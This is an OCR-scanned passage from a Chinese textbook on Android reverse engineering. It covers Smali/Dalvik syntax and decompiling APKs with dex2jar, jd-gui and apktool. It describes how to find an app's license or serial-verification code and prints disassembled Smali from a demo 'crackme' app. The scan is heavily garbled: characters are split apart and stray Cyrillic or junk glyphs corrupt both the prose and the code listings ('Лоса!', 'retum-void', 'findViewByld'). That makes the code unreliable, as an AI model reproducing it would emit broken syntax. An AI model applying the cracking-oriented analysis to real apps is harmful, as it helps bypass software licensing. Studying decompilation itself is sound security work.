mTextView = (TextView)findViewByld(R.id.text view); 
mTextView.setText(R.string.hello); 


) 
} 
通过 对 比 发 现 基本 的 方法 名 称 没有 改变 ， 多 了 一 个 .method public constructor <init>OV 表示 该 类 不 带 参 数 的 
默认 构造 方法 ，onCreate0 方 法 是 以 .method public onCreate(Landroid/os/Bundle;)V 开始 ， 以 .end method 结束 。 


12.6.2 Smali 语法 基础 


(OD 类 型 

Dalvik 的 字 节 码 中 拥有 两 个 主要 的 类 型 : 基 类 和 引用 类 型 。 

引用 类 型 是 对 象 和 数组 ， 其 他 的 一 切 都 是 基 类 。 基 类 被 一 个 简单 的 字符 描述 ， 实 际 以 字符 串 的 形式 存 
储 于 DEX 文件 中 ， 被 定义 于 Dex 格式 的 网 页 文档 中 ， 在 AOSP 库 中 的 路 径 是 dalvik/docs/dex-format.html. 
具体 说 明 如 下 所 示 。 
V: 空 类 型 ， 仅 可 以 用 来 作为 返回 类 型 。 
Z: Boolean 布尔 型 。 
B: Byte 字 节 型 。 
S: Short 短 整 型 (16 位 ) 。 


IT 


oooo 
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C: Char 字 符 型 。 
I: int 整形 。 
J: long (64bits) EE (6447) 。 
F: float 浮 点 型 。 
D: double (64 bits) 双 精 度 型 (64 位 ) o 

例如 下 面 形式 的 对 象 。 

Lpackage/name/ObjectName 

开始 的 L 表明 这 是 一 个 对 象 类 型 ，package/name/ 就 是 该 对 象 ， 对 象 名 是 对 象 的 名 称 ， 并 且 分 号 表明 对 
象 名 的 结束 这 个 等 同 于 Java 语 言 中 的 package.name.ObjectName 结构 , 举 个 更 具体 的 例子 ,Ljava/lang/String; 
就 等 同 于 Java 语言 的 java.lang.String。 数 组 采用 “[” 的 形式 ， 这 代表 一 个 一 维 整形 数组 就 像 Java 语言 中 的 
int[]。 而 对 多 维 数组 ， 简 单 地 增加 字符 “[” 即 可 ， 例 如 [[I=int[ ][ ]〈 最 大 的 维度 是 2355) 。 也 可 以 使 用 数组 
对 象 ， 例 如 [Ljava/lang/String 就 是 一 个 字符 串 数组 。 

(2) 方法 

方法 总 是 被 定义 为 一 个 非常 复杂 的 包括 方法 、 方 法 名 、 参 数 类 型 和 返回 值 的 形式 。 所 有 的 这 些 信息 被 
要 求 对 于 虚拟 机 而 言 ， 可 以 找到 正确 的 方法 并 且 能 够 表现 字 节 码 上 的 静态 分 析 〈 为 了 确认 会 选择 最 优化 ) 。 
采用 如 下 所 示 的 形式 : 

Lpackage/name/ObjectName;->MethodName(III)Z 

在 这 个 例子 中 ， 应 该 识别 出 “Lpackage/name/ObjectName: ”是 一 个 类 ，MethodName 明显 是 一 个 方法 
B, (Ш) 是 方法 的 签名 ，“IIE” 在 这 个 例子 中 表示 3 个 整 型 参数 ，Z 表示 返回 一 个 布尔 类 型 的 返回 值 。 

方法 的 参数 一 个 接 一 个 地 列举 在 右边 ， 中 间 没 有 分 号 。 下 面 是 一 个 更 加 复杂 的 例子 。 

method(I[[IILjava/lang/String;[Ljava/lang/Object;)Ljava/lang/String; 

在 Java 语言 中 ， 应 该 是 这 样 的 : 

String method(int, int J[ ], int, String, Object[ ]) 

(3) M 

域 同样 的 被 指定 为 一 个 元 长 的 包括 域 、 域 名 、 域 类 型 的 形式 。 此 外 ， 也 允许 虚拟 机 找到 正确 的 域 来 表 
现 字 节 编码 的 静态 分 析 。 域 采用 如 下 形式 。 

Lpackage/name/ObjectName;->FieldName:Ljava/lang/String; 

以 上 代码 包括 域 、 域 名 和 域 类 型 。 在 Dalvik 字 节 码 中 ， 寄 存 器 总 是 32 位 可 以 存放 任何 类 型 的 值 ， 两 个 
寄存 器 可 以 用 来 存放 64 位 类 型 (长 整形 和 双 精 度 型 》。 

(4) 指定 方法 中 的 寄存 器 数字 

在 此 有 两 种 办 法 来 指定 一 种 方法 中 的 多 个 寄存 器 。 寄 存 器 直接 指定 方法 中 的 寄存 器 总 数 ， 或 者 区 域 变 
量 直接 指定 方法 中 的 非 参 数 寄存 器 数 。 寄 存 器 总 数 包括 方法 中 参数 所 需 的 所 有 寄存 器 。 

(5) 多 少 参数 传 入 方法 

当 一 个 方法 被 调用 ， 方 法 中 的 参数 被 放置 到 最 近 的 儿 个 寄存 器 。 如 果 一 个 方法 拥有 两 个 参数 和 5 个 寄 
存 器 ,这 些 参数 会 被 存放 到 最 后 的 两 个 寄存 器 УЗ 和 V4。 动态 方法 的 第 一 个 参数 总 是 被 调用 的 第 一 个 对 象 ， 
例如 ， 写 一 个 动态 方法 LMyObject;->callMe(IDV， 这 个 方法 有 两 个 整形 参数 ， 但 是 还 有 一 个 隐 含 的 参数 
LMyObject 在 两 个 整 型 参数 之 前 ， 所 以 总 共有 3 个 参数 在 这 个 方法 中 。 

假设 在 一 个 方法 中 制定 了 5 个 寄存 器 CV0—V4) ， 既 不 是 寄存 器 5 管理 也 不 是 本 地 寄存 器 2 管理 (2 
个 本 地 寄存 器 和 3 个 参数 寄存 器 ) 。 当 该 方法 被 调用 后 ， 被 调用 的 对 象 是 V2， 第 一 个 整 型 参数 是 V3， 第 二 
个 整 型 参数 是 V4。 在 静态 方法 中 也 是 同样 的 ， 除 非 没有 隐 含 的 this 指针 参数 。 

(6) 寄存 器 名 称 

对 于 寄存 器 来 说 有 两 种 命名 方案 ， 分 别 是 标准 的 V 命名 方案 和 对 于 参数 寄存 器 的 P 命名 方案 。 以 了 命 
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名 的 第 一 个 寄存 器 就 是 方法 中 的 第 一 个 参数 寄存 器 ， 所 以 回 到 之 前 的 总 共 拥有 5 个 寄存 器 中 的 3 个 参数 的 
例子 。 例 如 ， 下 面 显示 了 为 每 个 寄存 器 的 标准 V 命名 ， 紧 接着 是 为 参数 寄存 器 的 P 命名 。 

口 V0: 第 一 个 本 地 寄存 器 。 

а Vi: 第 二 个 本 地 寄存 器 。 

口 V2: 第 一 个 参数 寄存 器 。 

口 V3: 第 二 个 参数 寄存 器 。 

口 V4: 第 三 个 参数 寄存 器 。 

可 以 通过 每 个 名 称 类 参照 参数 寄存 器 。 

P 命名 方案 是 作为 一 个 实用 的 内 容 被 引入 的 ， 用 于 解决 编辑 Smali 编码 中 的 共同 的 难点 。 假 设 有 一 个 已 
经 存在 的 方法 拥有 一 定数 目的 参数 ， 想 增加 一 些 代码 到 这 个 方法 ， 会 发 现 需要 一 个 额外 的 寄存 器 。 也 许 大 
家 会 想 ， 仅 在 寄存 器 管理 中 增加 寄存 器 数目 就 可 以 了 ， 但 是 这 并 不 容易 ， 记 住 方法 中 的 参数 是 寄存 在 最 近 
的 寄存 器 中 的 。 如 果 增 加 寄存 器 数 ， 会 改变 方法 参数 在 寄存 器 中 的 输入 。 所 以 ， 不 得 不 改变 寄存 器 管理 并 
且 重 编号 参数 寄存 器 。 但 是 如 果 是 在 方法 中 使 用 P 命名 模式 来 引用 参数 寄存 器 ， 则 可 以 很 容易 地 改变 方法 
中 的 寄存 器 数 ， 而 不 必 担 心 重 编号 任何 存在 的 寄存 器 。 
注意 : 默认 baksmali 对 于 参数 寄存 器 使 用 P 命 名 模式 来 命名 - 如 果 因 为 某 些 原因 不 使 用 P 命 名 而 强制 使 用 

V 命 名 模式 ， 则 可 以 使 用 -p/--no-parameter-registers 来 选择 。 


(7) 长 整 型 / 双 精 度 型 值 CLong/Double values) 

鉴于 以 前 提 到 过 ， 长 整 型 和 双 精 度 型 (用 J 和 D 分 别 代表 ) 的 基本 单元 是 64 位 ， 需 要 使 用 两 个 寄存 器 。 
假如 拥有 一 个 非 静态 的 方法 LMyObject;->MyMethod(JZ)VO， 方 法 的 参数 是 LMyObject;、 整 型 、 长 整 型 和 
布尔 型 这 几 个 类 型 。 所 以 在 这 个 方法 中 会 要 求 5 个 寄存 器 来 存放 所 有 的 参数 ， 并 且 当 以 后 调用 这 个 方法 时 ， 
为 了 调用 该 指令 不 得 不 在 寄存 器 列表 中 指定 两 个 寄存 器 来 存放 任何 64 位 的 参数 。 现 在 baksmali 可 以 反 编 译 
ОРЕХ 文件 ， 并 且 选 择 性 地 deodex 这 些 文件 。 
注意 : 本 页 说 明 仅 应 用 于 baksmali v0.96-v1.1。v1.2 以 上 版 本 开始 不 再 要 求 deodexrant。 新 版 本 说 明 可 以 

在 http://code.google.com/p/smali/wiki/Deodexlnstructions 找 到 。 


有 关 Smali 语言 的 语法 知识 请 读者 参考 官方 文档 ， 如 图 12-25 Bros 
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图 12-25 Smali 语 言 的 语法 知识 


第 13 章 dexejar, jdguiexe 和 
Apktool 工具 反 编 译 实战 


在 本 章 的 内 容 中 , 将 通过 一 个 具体 演示 实例 的 实现 过 程 , 详细 讲解 编译 并 反 编译 APK 文件 的 完整 过 程 ， 
以 及 使 用 dex2jar、jdgui.exe 和 Apktool 工具 反 编 译 APK 文件 的 具体 过 程 。 希 望 通过 本 章 内 容 的 学 习 ， 为 读 
者 学 习 本 书后 面 的 知识 打下 基础 。 


13.1 反 编 译 APK 文件 


EA 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 13 章 \ 反 编译 APK 文件 .avi 
L T _ : | mume — 0) 
L - 光盘 sdaimala | 


按照 本 书 第 10 章 的 内 容 进 行 签名 打包 后 生成 一 个 APK 文件 ， 然 后 进行 如 下 反 编 译 步骤 。 
CD 来 到 反 编 译 工 具 dex2jar 和 jdgui.exe 目录 ， 打 开 Androidfby 目录 中 的 Android 反 编 译 工具 “Android 
反 编译 工具 .exe”， 双 击 打开 后 开始 进行 反 编译 工作 。 选 中 反 编 译 的 APK 文件 ， 然 后 单 击 “ 反 编译 ”按钮 ， 
如 图 13-1 所 示 。 
=x! 


кй 关于 关闭 
图 13-1 开始 反 编译 
(2) 打开 反 编 译 之 后 的 文件 夹 ， 编 译 后 的 文件 目录 被 默认 保存 在 Androidfby 下 的 根 目 录 中 ， 打 开 后 的 


效果 如 图 13-2 所 示 。 
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132 反 编 译 后 的 first 目录 
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G) 将 文件 classes.dex 复制 到 dex2jar 的 文件 夹 目录 下 ,， 即 需要 与 文件 dex2jar.bat 在 同一 目录 下 。 然 后 
打开 命令 提示 符 ， 一 直 打 开 到 dex2jar 目录 ， 执 行 如 下 命令 〈 注 意 中 间 有 空格 ) ， 如 图 13-3 所 示 。 

dex2jar.bat classes.dex 

(4) 此 时 会 在 dex2jar 目录 下 生成 一 个 名 为 classes dex2jarjar 的 文件 ， 接 下 来 运行 jd-gui 目录 下 的 
jd-gui.exe， 然 后 依次 选择 File | Openfil | classes_dex2jar jar 命令 后 即 可 查看 Java 代码 ， 如 图 13-4 所 示 。 


package first.a; 
import android.app.Activity; 
import android.os.Bundle; 
import android.widget.TextView; 


public class first extends Activity ( 
** Called when the activity is fir: 
@Ove 
public void onCreate(Bundle savedInstanceState) { 
super .onCreate(savedInstanceState); 
setContentView(R.layout.main); 
TextView tv = new TextView(this); 
tv.setText("rismsux: "); 
setContentView(tv); 


st created. * 


if possible 


) 
j T 


图 13-3 反 编 译 命令 图 13-4 生成 的 classes dex2jarjar 文件 
(5) 打开 apktool 目录 ， 在 命令 行 下 定位 到 apktool.bat 文件 夹 ， 然 后 输入 如 下 命令 ， 如 图 13-5 所 示 。 
apktool.bat d -f abc123.apk abc123 
在 上 述 指令 中 ，abc123.apk 是 预 反 编译 的 APK 文件 ，abc123 表示 设置 的 输出 文件 夹 。 


В 13-5 反 编译 命令 


(6) 也 可 以 将 反 编译 文件 重新 打包 成 APK 文件 ， 方 法 是 输入 如 下 id 命令 ， 如 图 13-6 所 示 。 
apktool.bat b abc123 


Building 


I: Building apk file... 


图 13-6 重新 编译 为 APK 文件 


CD 通过 上 述 命令 处 理 后 ， 打 包 АРК 后 的 文件 被 保存 在 C:\HelloAndroid 目录 下 ， 在 里 面 生成 了 两 个 
文件 夹 : build 和 dist。 其 中 ， 打 包 生 成 的 APK 文件 是 HelloAndroid.apk， 被 保存 在 dist 文件 夹 下 。 

(8) 反 编 译 APK 文件 成 功 后 ,会 在 当前 的 outdir 目录 下 生成 一 系列 目录 与 文件 。 对 于 一 般 的 Android 
程序 来 说 ， 错 误 提示 信息 通常 是 指引 关键 代码 的 风向 标 ， 在 错误 提示 附近 一 般 是 程序 的 核心 验证 代码 ， 分 
析 人 员 需 要 阅读 这 些 代 码 来 理解 软件 的 注册 流程 。 当 APK 文件 在 打包 时 ，strings.xml 文件 中 的 字符 串 被 加 
密 存储 为 resources.arsc 文件 ， 并 保存 到 АРК 程序 包 中 ，APK 被 成 功 反 编译 后 这 个 文件 也 被 解密 出 来 了 。 
当 通 过 Apktool 反 编 译 APK 文件 后 会 生成 一 个 名 为 Smali 的 文件 夹 ， 里 面 都 是 以 .smali 结尾 的 文件 ， 如 图 13-7 
所 示 。 


droid 系统 安全 和 反 编译 实战 


c saali 


图 13-7 反 编译 后 的 文件 
13.2 ”分析 反 编译 后 的 文件 


бы 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 13 章 \ 分 析 反 编译 后 的 文件 .avi 

在 Android 应 用 项 目 中 ， 在 每 个 编译 后 的 APK 文件 中 都 包含 有 一 个 设置 文件 AndroidManifestxml， 此 
文件 记录 了 这 个 项 目的 基本 信息 ， 例 如 ， 包 名 、 运 行 的 系统 版 本 、 用 到 的 组 件 等 ， 并 且 这 个 文件 被 加 密 保 
存 到 APK 文件 中 。 在 本 节 的 内 容 中 ， 将 详细 分 析 反 编译 后 的 文件 。 


13.2.1 分 析 主 Activity 


-个 Android 应 用 程序 通常 由 一 个 或 多 个 Activity 和 相关 的 组 件 组 成 ,每 个 Activity 都 是 同 级 别 的 对 象 ， 
不 同 的 Activity 可 以 实现 不 同 的 功能 。 在 Android 系统 中 ， 每 个 Activity 都 是 程序 的 展示 信息 页 面 ， 功 能 是 
显示 数据 处 理 后 的 结果 。 在 Android 应 用 程序 中 ， 大 多 数 功能 是 显示 用 户 与 Activity 之 间 的 交互 结果 。 
在 Android 应 用 程序 中 ， 每 个 程序 有 且 只 有 一 个 主 Activity， 这 是 程序 启动 的 第 一 个 Activity。 打 开本 
实例 “ 反 编译 后 ”目录 下 的 AndroidManifest.xml 文件 ， 其 实现 代码 如 下 所 示 。 
«activity android:label="@string/title activity main" android:name=". 
MainActivity"> 
<intent-filter> 
<action android:name="android.intent.action.MAIN" /> 
«category android:name="android.intent.category.LAUNCHER" /> 
</intent-filter> 
</activity> 
在 上 述 代码 中 , 文件 AndroidManifest.xml 中 使 用 <activity> 标 签 手动 声明 了 Activity, 具体 说 明 如 下 所 示 。 
android:label: 功能 是 设置 Activity 的 标题 。 
android:name: 功能 是 设置 一 个 具体 的 Activity 类 。 
.MainActivity: 在 前 面 省 略 了 程序 的 包 名 ， 完 整 类 名 应 该 为 com.guan.crackme.MainActivity 。 
intent-filter: 功能 是 指定 了 Activity 的 启动 意图 ，android.intent.action.MAIN 表示 这 个 Activity 是 本 程 
序 的 主 Activity。 
android.intent.category.LAUNCHER : 表示 可 以 通过 LAUNCHER 来 启动 这 个 Activity 。 在 文件 
AndroidMenifestxml 中 ， 如 果 所 有 的 Activity 都 没有 添加 android.intent.category.LAUNCHER , Ж 
么 当 这 个 程序 被 安装 到 Android 设 备 后 在 程序 列表 中 不 可 见 。 同 理 ， 如 果 在 程序 中 没有 指定 
android.intent.action.MAIN， 则 Android 的 LAUNCHER 就 无 法 匹配 程序 的 主 Activity， 所 以 在 这 个 程 
序 中 不 会 出 现 图 标 。 
在 反 编 译 后 的 文件 AndroidManifest.xml 中 发 现 主 Activity 后 ， 就 可 以 直接 查看 其 所 在 类 的 OnCreate() 
方法 的 反 汇编 代码 。 在 Android 应 用 程序 中 ，OnCreate() 方 法 通常 是 这 个 程序 的 代码 入 口 ， 一 般 的 功能 都 是 
从 此 处 开始 执行 的 ， 所 以 可 以 从 此 处 开始 分 析 并 追踪 整个 程序 的 具体 执行 流程 。 
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13.2.2 分 析 类 


如 果 需 要 在 Android 应 用 程序 的 组 件 之 间 传 递 全 局 变量 ， 或 需要 在 启动 Activity 前 做 一 些 初始 化 工作 
可 以 考虑 使 用 Application 类 实现 。 在 使 用 Application 时 ， 需 要 在 程序 中 添加 一 个 继承 自 
android.app.Application 的 类 ， 然 后 重 写 其 OnCreate() 方 法 ， 可 以 在 Android 的 其 他 组 件 中 访问 OnCreate() 方 
法 中 初始 化 的 全 局 变量 (前 提 是 这 些 变量 具有 public 属性 ) 。 除 此 之 外 , 还 需要 在 文件 AndroidManifest.xml 
中 的 Application 标签 中 添加 android:name 属性 ， 这 个 属性 的 取 值 是 继承 自 android.app.Application 的 类 名 。 

在 Android 应 用 程序 中 ， 因 为 类 Application 比 程序 中 其 他 的 类 启动 得 都 要 早 一 些 ， 所 以 通常 将 在 该 类 
中 实现 授权 验证 代码 。 例 如 ， 通 常 在 OnCreate0 方 法 中 检测 软件 的 购买 状态 ， 如 果 状 态 异常 则 拒绝 程序 继续 
运行 。 由 此 可 见 ， 在 分 析 Android 应 用 程序 时 需要 先 查 看 该 程序 是 否 具有 Application 类 ， 如 果 有 ， 则 需要 
检测 在 OnCreate() 方 法 中 是 否 做 了 一 些 影响 到 逆向 分 析 的 初始 化 工作 。 


13.2.3 ”定位 程序 的 核心 代码 


反 编译 Android 程序 后 的 代码 量 非常 庞大 ,在 这 些 代码 中 寻找 程序 关键 代码 的 工作 并 不 容易 ， 此 时 一 个 
程序 员 的 经 验 与 技巧 便 显 得 愈 发 珍贵 。 通 常 来 说 ， 定 位 反 编 译 程序 的 常用 方法 如 下 所 示 。 

о 顺序 查找 法 

顺序 查找 法 是 指 从 软件 的 启动 部 分 代码 开始 寻找 ， 逐 行 向 后 分 析 ， 理 解 并 掌握 整个 软件 的 执行 流程 。 
这 种 分 析 方 法 的 优点 是 可 以 掌握 整个 软件 的 细节 ， 缺 点 是 比较 耗 时 。 

口 信息 反馈 法 

信息 反馈 法 是 指 先 运行 目标 程序 ， 然 后 根据 程序 运行 时 给 出 的 反馈 信息 作为 突破 口 寻 找 关 键 代 码 。 例 
如 ， 在 运行 目标 程序 并 输入 错误 的 反馈 信息 时 ， 系 统 会 弹出 对 应 的 错误 提示 ， 因 为 在 程序 中 用 到 的 字符 串 
会 被 存储 在 String.xml 文件 或 者 硬 编码 到 程序 代码 中 。 如 果 被 存储 在 String.xml 文件 中 ， 则 在 程序 中 的 字符 
串 会 以 id 的 形式 访问 ， 此 时 只 需 在 反 汇编 代码 中 搜索 字符 串 的 id 值 就 可 以 找到 调用 代码 的 位 置 。 如 果 被 
硬 编码 的 方式 存储 到 程序 代码 中 ， 则 只 需 在 反 汇编 代码 中 直接 搜索 字符 串 即 可 。 

口 函数 特征 分 析 法 

函数 特征 分 析 法 与 信息 反馈 法 类 似 , 可 以 根据 反馈 信息 调用 Android SDK 中 提供 的 相关 АРІ 函数 来 完 
成 定位 功能 。 

口 注入 代码 法 

注入 代码 法 属于 动态 调试 方法 ， 其 原理 是 手动 修改 APK 文件 的 反 汇编 代码 ， 然 后 加 入 Log 输出 ， 并 结 
合 LogCat 查看 程序 执行 到 特定 点 时 的 状态 数据 。 

о 栈 跟踪 法 

栈 跟踪 法 是 一 种 动态 调试 方法 ， 其 实现 原理 是 输出 运行 时 的 栈 跟踪 信息 ， 根 据 栈 上 的 函数 调用 序列 来 
理解 方法 的 执行 流程 。 


13.3 分析 Smali 文件 


Би 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 13 章 \ 分 析 Smali 文件 .avi 
当 使 用 Apktool 工具 反 编译 本 实例 的 APK 文件 后 , 会 在 反 编译 工程 目录 下 生成 一 个 smali 目录 , 如 图 13-8 


所 示 。 
29) 


хеее 


反 编译 后 的 > smali ~ Ге ai e 
AR WEAR =+ шө 
Е m еза [а= 
D android 2014/2/23 10:56 XAR 
Й со 2014/2/23 11:05 ZHR 


Еті w 
13-8 ” 反 编 译 后 的 smali 目录 


在 反 编 译 后 的 smali 目录 中 ， 保 存 了 所 有 反 编 译 出 的 Smali 文件 ， 这 些 文件 的 功能 是 根据 程序 包 的 层次 
结构 生成 相应 的 目录 。 在 Android 应 用 程序 中 ， 在 程序 编译 前 的 所 有 Java 类 都 会 在 编译 后 的 相应 目录 下 生 
成 独立 的 Smali 文件 ， 例 如 ， 反 编译 本 实例 APK 文件 后 ， 会 在 smali 目录 下 依次 生成 com/guan/crackme 目 
录 结 构 ， 并 在 这 个 目录 下 分 别 生成 各 个 类 的 .smali 格式 文件 ， 如 图 13-9 所 示 。 


RE mdi oa on dae v E | EE e [7] 
т + ое 

езет ян ES 
2014/2/23 11 05 SMALI 文件 1 
2014/2/23 иип SMALI 文件 2m 
2014/2/23 1111 SMLI 文件 зю 
2014/2/?3 11 11 тил У 5 了 
—— sar SE эю 
amena эшш sm 
con 1107 ош 1 4 
2014/2/23 1108 SMALI 文件 1X5 
2014/2/23 11.08 SWLI 文件 1 
201412/23 11 06 SMALT 文件 1x 
2014/2/23 11 08 SMALI 文件 18 
2014/2/23 11 отп аит 文件 1 
Z014/2/23 iot SMALL 文件 im 
2014/2/23 11 11 SMALI 文件 118 
2014/2/23 11 11 тил 文件 1x 


图 13-9 生成 的 .smali 格式 文件 


SER: 在 Android 应 用 中 ,通常 .smali 格 式 文件 代码 的 指令 繁多 ,在 阅读 时 建议 使 用 专 有 的 阅读 工具 ,这 
样 能 够 将 特殊 指令 (例如 条 件 跳 转 指令 ) 实现 高 亮 显 示 效 果 ， 可 以 提高 分 析 工 作 的 效率 。 


在 Android 应 用 程序 中 ， 无 论 是 普通 类 、 抽 象 类 、 接 口 类 或 者 内 部 类 ， 在 反 编译 后 的 代码 中 都 以 单独 
的 .smali 格式 文件 存放 。 每 个 .smali 格式 文件 都 由 若干 代码 语句 组 成 ， 所 有 的 代码 诸 句 都 遵循 了 严格 的 语法 
规范 。 通 常 来 说 ，.smali 格式 文件 的 前 3 行 代码 描 述 了 当前 类 的 一 些 信息 ， 具 体格 式 如 下 所 示 。 

.class < 访问 权限 > [修饰 关键 字 ] < 类 名 > 

.SUper < 父 类 名 > 

.source < 源 文件 名 > 


1331 ”一段 演示 文件 
例如 ， 打 开 文 件 MainActivity.smali， 具 体 代 码 如 下 所 示 。 
.Class public Lcom/guan/crackme/MainActivity; 


.Super Landroid/app/Activity; 
.source "MainActivity.java" 


@ 
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# annotations 
.annotation system Ldalvik/annotation/MemberClasses; 
value = ( 
Lcom/guan/crackme/MainActivity$SNChecker; 
5 
.end annotation 


# instance fields 
.field private btnAnno:Landroid/widget/Button; 


field private btnCheckSN:Landroid/widget/Button; 


.field private edtSN:Landroid/widget/EditText; 


# direct methods 
.method public constructor <init>()V 
locals 0 


.prologue 
Jine 19 
invoke-direct {p0}, Landroid/app/Activity;-><init>()V 


return-void 
.end method 


.method static synthetic access$0(Lcom/guan/crackme/MainActivity;)V 
locals 0 
.parameter 


.prologue 
line 52 
invoke-direct {p0}, Lcom/guan/crackme/MainActivity;->getAnnotations()V 


return-void 
.end method 


.method static synthetic access$1(Lcom/guan/crackme/MainActivity;)Landroid/widget/EditText; 
locals 1 
.parameter 


.prologue 
line 22 
iget-object vO, ро, Lcom/guan/crackme/MainActivity;->edtSN:Landroid/widget/EditText; 


return-object vO 
.end method 
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.method private getAnnotations()V 


locals 10 

.prologue 

ine 54 

жу start 0 

const-string v8, "com.guan.anno.MyAnno" 

invoke-static {v8}, Ljava/lang/Class;-»forName(Ljava/lang/String;)Ljava/lang/Class; 
move-result-object vO 

Jine 55 

local vO, anno:Ljava/lang/Class;,"Ljava/lang/Class<*>;" 

const-class v8, Lcom/guan/anno/MyAnnoClass; 

invoke-virtual (v0, v8}, Ljava/lang/Class;-»isAnnotationPresent(Ljava/lang/Class;)Z 
move-result v8 


if-eqz v8, :cond 0 


line 56 
const-class v8, Lcom/guan/anno/MyAnnoClass; 


invoke-virtual {vO, v8}, Liava/lang/Class;->getAnnotation(Ljava/lang/Class; )Ljava/lang/annotation/Annotation; 
move-result-object v4 

check-cast v4, Lcom/guan/anno/MyAnnoClass; 

line 57 

Лоса! v4, myAnno:Lcom/guan/anno/MyAnnoClass; 

invoke-interface {v4}, Lcom/guan/anno/MyAnnoClass;->value()Ljava/lang/String; 

move-result-object v8 


const/4 v9, 0x0 


invoke-static (pO, v8, v9), Landroid/widget/Toast;-»makeText(Landroid/content/Context;Ljava/lang/CharSequence;l) 


Landroid/widget/Toast; 


move-result-object v8 
invoke-virtual (v8), Landroid/widget/Toast;->show()V 


line 59 

.end local v4 #myAnno:Lcom/guan/anno/MyAnnoClass; 
:cond 0 

const-string v8, "outputlInfo" 
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const/4 v9, 0х0 

invoke-virtual (vO, v8, v9}, Ljavallang/Class;-»getMethod(Ljava/lang/String;[L java/tang/Class;) Ljava/lang/reflect/Method; 
move-result-object v3 

ine 60 

local v3, method:Ljava/lang/reflect/Method; 

const-class v8, Lcom/guan/anno/MyAnnoMethod; 

invoke-virtual (v3, v8), Ljava/lang/reflect/Method;->isAnnotationPresent(Ljava/lang/Class;)Z 

move-result v8 

if-eqz v8, :cond 1 


ine 61 
const-class v8, Lcom/guan/anno/MyAnnoMethod; 


invoke-virtual (v3, v8), Ljava/lang/reflect/Method;->getAnnotation (Ljava/lang/Class; )L java/lang/annotation/Annotation; 
move-result-object v6 

check-cast v6, Lcom/guan/anno/MyAnnoMethod; 

Jine 62 

Лоса! v6, myMethod:Lcom/guan/anno/MyAnnoMethod; 

new-instance v8, Ljava/lang/StringBuilder; 

invoke-interface (v6), Lcom/guan/anno/MyAnnoMethod;->name()Ljava/lang/String; 
move-result-object v9 

invoke-static (v9), Ljava/lang/String;->valueOf(Ljava/lang/Object; )Ljava/lang/String; 
move-result-object v9 

invoke-direct (v8, v9), Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V 

const-string v9, " is " 

invoke-virtual (v8, v9), Ljava/lang/StringBuilder;->append(Ljava/lang/String; )Ljava/lang/StringBuilder; 
move-result-object v8 

invoke-interface (v6), Lcom/guan/anno/MyAnnoMethod;-»age()I 


move-result v9 


invoke-virtual (v8, v9}, Ljava/lang/StringBuilder;-»append(lI)Ljava/lang/StringBuilder; 
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move-result-object v8 

const-string v9, " years old." 

invoke-virtual (v8, v9), Ljava/lang/StringBuilder;->append(Ljava/lang/String; )Ljava/lang/StringBuilder; 
move-result-object v8 

invoke-virtual (v8), Ljava/lang/StringBuilder;-»toString()Ljava/lang/String; 

move-result-object v7 

ine 63 

local v7, str:Ljava/lang/String; 


const/4 v8, 0x0 


invoke-static (pO, v7, v8), Landroid/widget/Toast;-»makeText(Landroid/content/Context;Ljava/lang/Char 
Sequence;l)Landroid/widget/Toast; 


move-result-object v8 

invoke-virtual (v8), Landroid/widget/Toast;->show()V 

Jine 65 

.end local v6 #myMethod:Lcom/guan/anno/MyAnnoMethod; 

.end local v7 #str:Ljava/lang/String; 

:cond 1 

const-string v8, "sayWhat" 

invoke-virtual (v0, v8), Ljava/lang/Class;->getField(Ljava/lang/String;)Ljava/lang/reflect/Field; 
move-result-object v2 

ine 66 

Лоса! v2, field:Ljava/lang/reflect/Field; 

const-class v8, Lcom/guan/anno/MyAnnoField; 

invoke-virtual (v2, v8}, Ljava/lang/reflect/Field;->isAnnotationPresent(Ljava/lang/Class;)Z 
move-result v8 


if-eqz v8, :cond 2 


line 67 
const-class v8, Lcom/guan/anno/MyAnnoField; 


invoke-virtual (v2, v8), Ljava/lang/reflect/Field;-»getAnnotation(Ljava/lang/Class;)L java/lang/annotation/Annotation; 
move-result-object v5 


check-cast v5, Lcom/guan/anno/MyAnnoField; 


(m 
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ine 68 
Лоса! v5, myField:Lcom/guan/anno/MyAnnoField; 
invoke-interface {v5}, Lcom/guan/anno/MyAnnoField;->info()Ljava/lang/String; 


move-result-object v8 
const/4 v9, 0x0 


invoke-static (pO, v8, v9), Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/Char 
Sequence;l)Landroid/widget/Toast; 


move-result-object v8 


invoke-virtual (v8), Landroid/widget/Toast;->show()V 
Жу end 0 
.catch Ljava/lang/Exception; {гу start 0 .. :try епа 0} :catch 0 


line 73 

.end local v0 #anno:Ljava/lang/Class;,"Ljava/lang/Class<*>;" 
.end local v2 #field:Ljava/lang/reflect/Field; 

.end local v3 #method:Ljava/lang/reflect/Method; 

.end local v5 #myField:Lcom/guan/anno/MyAnnoField; 
:cond 2 

:goto 0 

retum-void 


Jine 70 
:catch. 0 
move-exception v1 


line 71 
local v1, e:Ljava/lang/Exception; 
invoke-virtual (v1), Ljava/lang/Exception;->printStackTrace()V 


goto :goto 0 
.end method 


# virtual methods 

.method public onCreate(Landroid/os/Bundle;)V 
locals 2 
parameter "savedinstanceState" 


.prologue 
line 25 
invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V 


ine 26 
const/high16 vO, 0x7f03 
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invoke-virtual (pO, v0), Lcom/guan/crackme/MainActivity;-» setContentView(I)V 


ine 28 
const/high16 vO, 0x7f08 


invoke-virtual (pO, vO}, Lcom/guan/crackme/MainActivity;->find ViewByld(l)Landroid/view/View; 
move-result-object vO 

check-cast v0, Landroid/widget/Button; 

iput-object vO, p0, Lcom/guan/crackme/MainActivity;->btnAnno:Landroid/widget/Button; 


ine 29 
const v0, 0x7f080002 


invoke-virtual (pO, v0), Lcom/guan/crackme/MainActivity;->find ViewByld(I)Landroid/view/View; 
move-result-object vO 

check-cast v0, Landroid/widget/Button; 

iput-object vO, p0, Lcom/guan/crackme/MainActivity;->btn CheckSN:Landroid/widget/Button; 


line 30 
const vO, 0x7f080001 


invoke-virtual (pO, v0), Lcom/guan/crackme/MainActivity;->find ViewByld(I)Landroid/view/View; 
move-result-object vO 

check-cast v0, Landroid/widget/EditText; 

iput-object vO, p0, Lcom/guan/crackme/MainActivity;->edtSN:Landroid/widget/EditText; 


line 32 
